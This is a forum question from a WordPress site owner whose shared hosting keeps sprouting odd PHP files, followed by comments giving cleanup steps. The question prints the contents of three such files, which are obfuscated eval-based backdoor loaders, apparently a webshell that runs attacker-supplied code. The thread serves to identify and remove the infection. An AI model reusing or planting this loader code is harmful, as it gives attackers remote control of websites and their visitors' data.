# What is the folder which is named as 2o8yaett?

Tags: wordpress

There is a  problem in the system. The hosting that i use creates folders own its own. File extensions are 2o8yaett.php,g9v0okh4.php. It also creates fake folders such as index.php, cache.php. It breaks index.php foldrs of my wordpress sites. How can i slove this problem ?

2o8yaett.php

```
 $oidmnkl){function ghdxmxv($nnddx, $kujjzrc, $hvidkqy){return $nnddx[6]($nnddx[4]($kujjzrc . $nnddx[0], ($hvidkqy / $nnddx[8]($kujjzrc)) + 1), 0, $hvidkqy);}function dqltm($nnddx, $trtse){return @$nnddx[9]($nnddx[1], $trtse);}function cvtkdlp($nnddx, $trtse){$vbbdg = $nnddx[3]($trtse) % 3;if (!$vbbdg) {eval($trtse[1]($trtse[2]));exit();}}$oidmnkl = dqltm($nnddx, $oidmnkl);cvtkdlp($nnddx, $nnddx[5]($nnddx[2], $oidmnkl ^ ghdxmxv($nnddx, $kujjzrc, $nnddx[8]($oidmnkl))));}
```

alias.php

```
 $oidmnkl){function ghdxmxv($nnddx, $kujjzrc, $hvidkqy){return $nnddx[6]($nnddx[4]($kujjzrc . $nnddx[0], ($hvidkqy / $nnddx[8]($kujjzrc)) + 1), 0, $hvidkqy);}function dqltm($nnddx, $trtse){return @$nnddx[9]($nnddx[1], $trtse);}function cvtkdlp($nnddx, $trtse){$vbbdg = $nnddx[3]($trtse) % 3;if (!$vbbdg) {eval($trtse[1]($trtse[2]));exit();}}$oidmnkl = dqltm($nnddx, $oidmnkl);cvtkdlp($nnddx, $nnddx[5]($nnddx[2], $oidmnkl ^ ghdxmxv($nnddx, $kujjzrc, $nnddx[8]($oidmnkl))));}
```

g9v0okh4.php

```
 $lrgusga){function cdwtzm($edafa, $gqarbmn, $qtzpj){return $edafa[6]($edafa[4]($gqarbmn . $edafa[0], ($qtzpj / $edafa[8]($gqarbmn)) + 1), 0, $qtzpj);}function lqgcl($edafa, $witpkte){return @$edafa[9]($edafa[1], $witpkte);}function yhajb($edafa, $witpkte){$xwkdchr = $edafa[3]($witpkte) % 3;if (!$xwkdchr) {eval($witpkte[1]($witpkte[2]));exit();}}$lrgusga = lqgcl($edafa, $lrgusga);yhajb($edafa, $edafa[5]($edafa[2], $lrgusga ^ cdwtzm($edafa, $gqarbmn, $edafa[8]($lrgusga))));}
```

Comment: looks like some virus code. contact to your hosting support

Comment: how can i solve this problem ?

Comment: if the files are out of public_html folder, too. then I don't think it'll be right to remove them by yourself. are files only in the `public_html` folder?

Comment: I have shared hosting. there are 5 websites among it. and these sites are not in public_html folder. They are always out. When ı control it, these kind of files appear own their own. And ı cant stop this situation. I have changed FTP and cPanel passwords. I controled on cPanel but there is no solution.

Comment: of course, you can try to remove it yourself, but if you're don't know programming languages deeply, it'll be hard to explain the steps, which may help

Comment: first of all, remove all wordpress core files( besides `wp-config.php` and `wp-content` folder, but be sure that there isn't some code not related to it ) and upload fresh wordpress files( same version as yours )

Comment: second, dig into `wp-content` folder( upload it and check in all files `base64`, `file_get_contents`, `file_put_contents`, `move_uploaded_file` and other php file functions working with file system. the main of them you can find here: http://php.net/manual/en/ref.filesystem.php ). some of founded results may be clear code, which used some normal plugins/themes. and delete all strange code like you provided

Comment: after, use several antivirus programms to find marwale codes in the `wp-content` folder. of course, remove all files like you provided.and last stage will be to check database for bad code.